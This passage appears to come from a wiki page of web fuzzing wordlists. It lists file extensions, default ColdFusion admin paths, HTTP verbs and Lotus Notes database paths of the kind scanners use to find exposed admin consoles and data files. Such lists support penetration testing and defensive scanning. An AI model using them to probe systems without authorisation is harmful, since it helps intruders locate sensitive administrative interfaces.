.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
